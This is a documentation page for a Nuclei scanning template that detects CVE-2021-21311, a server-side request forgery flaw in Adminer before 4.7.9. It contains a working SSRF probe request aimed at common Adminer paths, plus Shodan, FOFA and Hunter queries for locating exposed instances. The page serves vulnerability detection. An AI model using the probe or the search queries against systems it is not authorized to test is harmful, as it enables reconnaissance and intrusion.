Adminer <4.7.9 - Server-Side Request Forgery
ID: CVE-2021-21311
Severity: high
Author: Adam Crosser,pwnhxl
Tags: cve2021,cve,adminer,ssrf
Description
Section titled “Description”Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2021-21311
info: name: Adminer <4.7.9 - Server-Side Request Forgery author: Adam Crosser,pwnhxl severity: high description: Adminer before 4.7.9 is susceptible to server-side request forgery due to exposure of sensitive information in error messages. Users of Adminer versions bundling all drivers, e.g. adminer.php, are affected. An attacker can possibly obtain this information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability could lead to unauthorized access to internal resources and potential data leakage. remediation: Upgrade to version 4.7.9 or later. reference: - https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 - https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf - https://packagist.org/packages/vrana/adminer - https://nvd.nist.gov/vuln/detail/CVE-2021-21311 - https://github.com/vrana/adminer/commit/ccd2374b0b12bd547417bf0dacdf153826c83351 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cve-id: CVE-2021-21311 cwe-id: CWE-918 epss-score: 0.02092 epss-percentile: 0.89083 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 6 vendor: adminer product: adminer shodan-query: - title:"Login - Adminer" - cpe:"cpe:2.3:a:adminer:adminer" - http.title:"login - adminer" fofa-query: - app="Adminer" && body="4.7.8" - title="login - adminer" - app="adminer" && body="4.7.8" google-query: intitle:"login - adminer" hunter-query: - app.name="Adminer"&&web.body="4.7.8" - app.name="adminer"&&web.body="4.7.8" tags: cve2021,cve,adminer,ssrf
http: - raw: - | POST {{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
auth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}
payloads: path: - "/index.php" - "/adminer.php" - "/adminer/adminer.php" - "/adminer/index.php" - "/_adminer.php" - "/_adminer/index.php"
attack: batteringram stop-at-first-match: true redirects: true max-redirects: 1
matchers-condition: and matchers: - type: word part: body words: - "<title>400 - Bad Request</title>" - "<title>400 - Bad Request</title>" condition: or
- type: status status: - 403# digest: 4b0a00483046022100bec6e1481b42e1a3b057e589e945d712b37d296722068388634fc354409ad7e602210093c64cfe91e82a4beb36cbecaa73bdaecd298ded75a9d7c8abeda9c53c45cbc6:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-21311.yaml"